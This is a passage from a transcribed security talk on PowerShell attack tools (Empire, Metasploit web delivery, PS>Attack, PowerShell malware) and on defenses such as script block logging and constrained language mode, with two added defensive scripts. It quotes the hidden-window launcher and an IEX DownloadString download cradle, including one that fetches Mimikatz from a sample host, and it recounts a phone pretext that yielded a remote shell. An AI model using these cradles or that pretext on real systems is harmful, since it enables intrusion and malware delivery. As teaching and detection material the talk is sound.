didn't have a screenshot of it, but basically once after you run this and you double-click on notepad.exe, it'll spawn whatever program you told it to; in this case it would open up calc on top of that. But if you don't have powershell.exe on your computer, or you happen to have an administrator who blocked the use of powershell.exe, that's no problem, there are plenty of tools around that. Have you guys been on a network that blocks cmd.exe before? No? I have; I've been somewhere they won't allow you to run cmd.exe, but you can run PowerShell. I actually don't know why; it doesn't make any sense, PowerShell you can do lots more stuff with. But if they have application whitelisting and you can't use powershell.exe at all, that's no problem. This guy right here, Jared Haight, wrote a tool called PS>Attack. Not only does it run PowerShell commands without powershell.exe, this guy has taken all the tools that I previously talked to you about and crammed them into this compiled binary. To make it even better than that, he's encrypted all the modules when they're stored on disk, and when you double-click the program and run it, he loads those encrypted modules into memory and then decrypts them. That makes it really hard for antivirus to tell what's going on, because even if it was going to flag on some PowerShell module based off the text of it, it's not going to know, because by the time it gets decrypted it's already in memory. So there's some of the tool list that he has over there: PowerSploit, PowerTools, Nishang, Powercat, Inveigh, just like all the tools I was just telling you about. He has them all compiled in this one binary; you just run it on your computer and you're good to go, and it does tons of other stuff on top of that. If that wasn't good enough for you, a guy named Ben Ten, who's also very prominent in the PowerShell space, wrote a tool called Not PowerShell. It's just an exe and it runs PowerShell commands for you. The one thing to know about PowerShell: earlier when we first started talking, I was talking about how it works with .NET. PowerShell is really just an interface that deals with the common language interface that .NET uses, so if you take away powershell.exe, that's no problem, somebody will just write their own tool that talks straight to that common language interface, and this is the tool that does that. Here's an example of me just using, again, the IEX download cradle without PowerShell, downloading PowerView and then finding out where the domain controller was. I used that to step it up here a little bit with
remote access tools. Here's one called PoshRat by Casey Smith. These are some of the functionalities, but you can basically use it to set up a web server and then you can see it connect web shells back and forth. I don't use it too often, but again, you just use the IEX download cradle to get yourself remote access to a computer. Metasploit has a ton of functionality for PowerShell; these are some of the modules that are listed in there. I know it's a lot. I'm going to move on to the next section, where I show you some images. You can set up a reverse PowerShell payload; this is kind of how that's set up. But one of the better things to note about PowerShell is they recently added a PowerShell extension, so you can actually have a fully native PowerShell shell inside of your Meterpreter session. Before, you could run a PowerShell command but it wouldn't let you do anything after that; it wouldn't give back feedback. Now you've got PowerShell at your fingertips through Meterpreter. So here's an example of me loading PowerShell, then I imported my own tool: again, I had Meterpreter access, I downloaded the PowerView script, and then I ran a command and it told me where the domain was. They've also exposed some of the Meterpreter functionality as .NET namespaces so you can interact with it; that's kind of what's going on here. I basically used this .NET namespace to run Mimikatz through Meterpreter. But one of the more popular things is called web delivery. Again, Andrew Smith, who's across the way, was a co-author on this particular Metasploit module. You basically go and set it up in Metasploit and then you get this command back up here: it's powershell, the -nop stands for NoProfile, the -w hidden hides the window so nobody sees it, and then the -c is "run this command". So what I do is I connect to a computer and I just run this command, and it gives me back a Meterpreter shell right back on the computer. Again, it uses the IEX download cradle to make a connection back to Metasploit and get that Meterpreter running in memory on the other box. I don't really have a demo, I was just kidding. Empire: again, written by that guy that I was talking about, Will Schroeder, and a couple of other people. But what's unique about Empire is that it is a PowerShell-only agent that stays in memory. So again it all runs in PowerShell; it's like Meterpreter, it has Meterpreter-type functionality, but it runs all in PowerShell, all in memory, on the target computer. Now you've got to set up persistence for that. You can configure, just like with Metasploit, the timeout for the connection, so you can say hey, if you can't reach the server for six weeks then you can die, or you can set it for two days, you can set it for whatever you want to, but it can keep trying for as long as it wants. But if you reboot the computer you'll lose it, because it's in memory. Some of the ways to use Empire: PowerEmpire is a PowerShell interface that connects to the Empire server; again, talking about PowerShell tools. Empire has a REST API; these are some of the functions that it has. There's an example of me connecting back to my PowerShell, sorry, my Empire server, and getting back information about the agents I have. Another web interface is called
PowerShell Empire Web. This one's actually written in PHP; it's not a PowerShell implementation. All right, let's talk about some malware. How many of you guys went to Aaron Lancaster's talk earlier and heard about some ransomware, PowerWare? It did the same thing, it happens in PowerShell. Looks like I'm running a little low on time, so I'll kind of give you the short and skinny on PowerShell malware. PowerShell malware comes through mostly through infected Word documents that run Visual Basic code, not Visual Basic, VBA code, that will launch a PowerShell session, and guess what it uses? It uses the IEX download cradle, when you have macros enabled in your Word documents, to execute and do what it needs to do. After that, this particular one used PowerShell and then it would go infect all your other Word documents, so when you spread them around it would just keep going. This one came through a malicious link as an attachment, but if you see down here, here's the code they were running: again, they bypassed execution policy and then they used the IEX DownloadString to download the code right after that. PowerSniff is a different set of malware running through a campaign; again, it downloads its shellcode. You can actually download DLL files into memory as well and execute those, on top of normal PowerShell stuff, but again, right down here it is using the IEX download cradle. Here's another set; this one kind of persisted in memory, I can't remember anything else unique about this one. Anyway, PowerShell malware does the same thing; it's just a different way to execute code on the box. This one comes in an infected Word document. One thing to note: this one actually came with infected PDF documents as well. There's a way that you can run code on a Windows box through a function in PDF, so it's not just limited to Word docs. This one is actually ransomware. They use this PowerShell game with the IEX download cradle, but this time the PowerShell actually does the encrypting of the files itself, so it doesn't use some other functionality. Again, what's unique about it forensically is there's nothing on disk for you to go back and look at to see what happened. It'll just sit there and start locking up your files for you, encrypting, and then throw up this message saying it wants money. Kansa is an incident response framework. I know you see a bunch of stuff on the side of the screen; it probably doesn't mean anything. What it pretty much does is remotely connect to any computer and grab all the files you would normally grab as an incident response person and pull them back for you. You kind of configure that, if you have a certain way that you grab files when you do forensic discovery or forensic response, and that's kind of what's going on here: it's grabbing a bunch of logs, a bunch of configuration settings, autoruns, all that kind of stuff. It grabs all the data and sticks it into objects; again, you can do powerful things with data objects, and you can go operate on them to do other things after that. PowerForensics is yet another tool. You can grab some stuff about the boot record with it, or the NTFS file system. He has a lot of neat stuff on here, but I like the bottom one in the right-hand corner, Invoke-ForensicDD; I'm pretty sure it just makes a dd image of a hard drive across the network. PowerShellArsenal is for reverse engineering; again, another tool set. It has a bunch of functionality that you can use; again, the tools are in PowerShell, so you can use it to do reverse engineering with that.
All right, a little bit of defense. Yeah, I told you about a lot of ways to get owned and a lot of ways to have fun, but one of the ways you can work with PowerShell to kind of stop attacks is to up your logging. I recommend everybody upgrade any computer they have to PowerShell version 5. Again, Windows 10 comes with it by default, but you can upgrade Windows 7 up to PowerShell version 5 as well, and the reason for that is because it has extended PowerShell logging in it. Before, you would just see that someone ran PowerShell, but if I used the encoded command you wouldn't know what I ran. PowerShell version 5 has the ability to do script block logging, so that long string of code that I showed you, all base64 stuff, it'll actually show you the de-obfuscated code in the log system. So if you pipe those logs to something like Splunk, then you can turn around and actually see what's going on. Now you can see the code that's being executed on a computer, so if somebody on your network used the IEX DownloadString download cradle and downloaded other malware, and you're checking your logs, you can see that they actually did that. It also has system-wide transcription, so you can record, on every computer on your entire domain or just specific ones of high value, every PowerShell command that's entered from the terminal and save it into a logging file, kind of like Linux shell logging. This is an example of me again creating some encoded command; this is what it looked like, again it's just a bunch of base64 string. All that was to set up this: when I executed the command on the system, when I executed it with the base64-encoded string, this is what gets stored in the log. You can actually see down here it's the actual clear text of the string; it's not that long base64-encoded string that you didn't know what I was talking about. So you can base64 it, you can XOR it, you can ROT13 it and you can compress it on top of that, but when it goes to the log file, it de-obfuscates it.
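[Editor's added example, not from the talk: how to switch on the PowerShell 5 logging the speaker recommends (script block logging, module logging and transcription, via the policy registry keys a GPO would set) and what to do with it afterwards: read the decoded script blocks from event ID 4104 and flag the patterns the talk calls out, including the -nop -w hidden -e one-liner from web delivery. Enabling needs admin and PowerShell 5 or later; the detection part runs on constructed sample events so it works offline. Function names, the transcript directory and the indicator list are the editor's.]

```powershell
# Editor's added example (not from the talk). Part 1: enable PowerShell 5
# logging. Part 2: read decoded script blocks back and flag suspicious ones.

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed location
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    foreach ($sub in 'ScriptBlockLogging', 'ModuleLogging\ModuleNames', 'Transcription') {
        New-Item -Path "$base\$sub" -Force | Out-Null
    }
    Set-ItemProperty "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    Set-ItemProperty "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*'
    Set-ItemProperty "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty "$base\Transcription" -Name OutputDirectory -Value $TranscriptDir
}

function Get-ScriptBlockEvents {
    # Event 4104 in Microsoft-Windows-PowerShell/Operational; the decoded
    # script text is the third property of the event.
    param([int]$MaxEvents = 200)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; Text = $_.Properties[2].Value } }
}

# Indicators the talk mentions (cradle, Mimikatz, shellcode injection) plus the
# web_delivery command-line shape. Editor's list; tune for your environment.
$Indicators = @(
    'DownloadString', 'DownloadFile', 'Invoke-Expression', '\bIEX\b',
    'FromBase64String', 'Invoke-Mimikatz', 'Invoke-Shellcode',
    '-nop\b.*-w(indowstyle)?\s+hidden',
    '-e(ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{40,}'
)

function Find-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][object[]]$Event)
    foreach ($e in $Event) {
        $text = $e.Text
        # If the block is itself a "-e <base64>" launcher, decode the payload
        # inline so the indicators are matched against plaintext too.
        if ($text -match '-e(ncodedcommand|nc)?\s+([A-Za-z0-9+/=]{40,})') {
            try {
                $text += "`n" + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            } catch { }
        }
        $hits = $Indicators | Where-Object { $text -match $_ }
        if ($hits) {
            [pscustomobject]@{
                Time       = $e.Time
                Indicators = ($hits -join ', ')
                Snippet    = $text.Substring(0, [Math]::Min(80, $text.Length))
            }
        }
    }
}

# Constructed sample events (not real log data): one benign, one encoded
# web_delivery style launcher, one plain download cradle.
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.5/Invoke-Mimikatz.ps1')"))
$Sample = @(
    [pscustomobject]@{ Time = Get-Date; Text = 'Get-ChildItem C:\Users | Measure-Object' },
    [pscustomobject]@{ Time = Get-Date; Text = "powershell.exe -nop -w hidden -e $enc" },
    [pscustomobject]@{ Time = Get-Date; Text = 'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.5/a")' }
)
Find-SuspiciousScriptBlock -Event $Sample | Format-List

# On a host with logging enabled:  Find-SuspiciousScriptBlock -Event (Get-ScriptBlockEvents)
```

Usage note: the benign sample produces no output; the other two are reported with the indicators that fired. Forward the 4104 events to the SIEM the talk mentions rather than running this per host, and keep the transcript directory writable by users but not readable, or the attacker reads their own transcript.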
PowerShell has this thing called constrained language mode, and it's probably the most powerful way to stop people from using PowerShell in nefarious ways. There are many language modes, but the one I want to talk to you about today is called constrained language mode. Again, I've told you before that PowerShell is primarily interacting with .NET. When you configure your PowerShell to operate in constrained language mode, you can no longer interact with the .NET services anymore; you're also not allowed to interact with Win32 APIs, and you can't interact with COM objects anymore. So it pretty much neuters PowerShell; you can't do much of anything with it. Now, you can set it through an environment variable, which I show here, and we could push it out with a GPO, but if you have local admin on the box you can just turn around and reset it back. But if it's a normal user and they don't have admin rights, and you didn't give them local admin, please don't do that, please don't give people local admin, then they'll be stuck with that environment variable and their PowerShell will be stuck in constrained language mode. But if you have AppLocker deployed on your network, when it's configured in allow mode, so whitelist mode, it will treat all PowerShell scripts as constrained language mode, and even if somebody is a local admin they can't change that without changing that particular control of AppLocker first. So if it's in tandem with AppLocker and you have constrained language mode set because you're using allow-only mode, then attackers will have a hard time executing code on your box. Here's an example of that I did. This top one is me checking my language mode; it said I had full language mode. Then below it I set the environment variable so that it would be put in constrained language mode. I had to open up a new window because it was a new environment, and then I checked my language mode again; you see here it says I'm in constrained language mode. And then I tried to use that beautiful IEX download cradle I talked about and it didn't work; it wouldn't do anything, because the PowerShell language was constrained. I'd have to get some other way, go find IE on the box or something. Question: "IEX is just shorthand for Invoke-Expression, so it's just another command-line PowerShell, right?" Yeah, it's just running a different PowerShell command. I don't personally know how IEX works in the background, but I'm willing to bet that it interacts with .NET and that functionality is removed. Yeah, yeah. These are additional resources. I didn't get the chance to talk about it, but WMI is kind of becoming a really popular thing, and what's neat about WMI is you can use it to execute PowerShell code as well.
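[Editor's added example, not from the talk: the constrained language mode check the speaker walks through, done in one function. It sets the __PSLockdownPolicy environment variable at machine level (value 4 = ConstrainedLanguage, which is what the talk relies on; Windows PowerShell 5.1 honors it, and setting it needs admin), launches a fresh powershell.exe so the new environment is picked up, probes what is and is not allowed, and then restores the previous value. This is the editor's code and it answers the audience question with a test rather than a guess: the cradle fails because New-Object on System.Net.WebClient is blocked, while Invoke-Expression itself still runs.]

```powershell
# Editor's added example (not from the talk): put a child PowerShell into
# constrained language mode via __PSLockdownPolicy and probe what it blocks.

function Test-LanguageMode {
    # Script run inside the child process; reports results as JSON.
    $probe = @'
$mode = $ExecutionContext.SessionState.LanguageMode
$r = [ordered]@{ LanguageMode = "$mode" }
# The object the download cradle needs: not a core type, so blocked in CLM.
try   { $null = New-Object System.Net.WebClient; $r['NewObject_WebClient'] = 'allowed' }
catch { $r['NewObject_WebClient'] = 'blocked' }
# A static .NET method call (the route to Win32 APIs): also blocked in CLM.
try   { $null = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); $r['StaticMethod_Marshal'] = 'allowed' }
catch { $r['StaticMethod_Marshal'] = 'blocked' }
# Invoke-Expression is an ordinary cmdlet and keeps working, but whatever it
# evaluates runs under the same constraints.
try   { Invoke-Expression 'Get-Date | Out-Null'; $r['InvokeExpression'] = 'allowed' }
catch { $r['InvokeExpression'] = 'blocked' }
[pscustomobject]$r | ConvertTo-Json -Compress
'@
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($probe))
    $old = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')
    try {
        # Needs admin. A new process is required, as the talk notes.
        [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
        $json = & powershell.exe -NoProfile -EncodedCommand $encoded
    } finally {
        # Restore; passing $null removes the variable if it did not exist.
        [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', $old, 'Machine')
    }
    $json | ConvertFrom-Json
}

"Current session: $($ExecutionContext.SessionState.LanguageMode)"
Test-LanguageMode
```

Usage note: the expected result on Windows PowerShell 5.1 is LanguageMode ConstrainedLanguage with the WebClient and static-method probes blocked and Invoke-Expression allowed. As the talk says, the variable is only a speed bump on its own; any local admin, or an attacker who reaches the registry, can clear it, which is why the speaker pairs it with AppLocker in allow mode.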
One of the malware samples I didn't stop and talk about actually executes its PowerShell code through WMI. These are some tools and some reports on WMI tools that you can use, that I didn't talk about in this presentation. All right, that's it. Do you guys have any questions? I know it's just meant to scratch the surface and get you in touch with some of the PowerShell attack tools and defense tools and all that kind of stuff. If anyone's got any questions... I think you can set the language mode all the way back as far as version 3, but I know you need to be on version 4.5 or 5 to work with AppLocker, and if I'm not a hundred percent sure on that, I could point you in the right place where I know you can get the answer for sure. I've not personally deployed AppLocker or deployed constrained language mode on a network. Like Matt was saying earlier, I get the beauty of breaking people's stuff and telling them to fix it; I don't have to fix anything. So blue team stuff is kind of... I know what I'm supposed to do from the documentation, I've never had to implement it. You know, you've got that thing where the technology is supposed to work a certain way, and then you try to roll it out and it's really a pain in the butt, you would have never thought it would be that way. So in theory that's all you've got to do; I've not actually set it up. Any questions? The IEX download cradle? Oh yes, yes, in fact I just did a pretext engagement a week ago where I called somebody on the phone and told them I needed them to download this web form for me, because I didn't know what goes in block 8, I told him. So he downloads it, and his company had macros enabled on Word documents. As soon as he opened the Word doc I had an Empire shell back, because I used PowerShell and the IEX download cradle and got myself an Empire agent on his computer right off the bat. It's just effective; we're talking just like the malware does. Again, I used the IEX download cradle to pull myself an Empire shell onto the computer. Any other questions? No? Thanks for your time, appreciate it.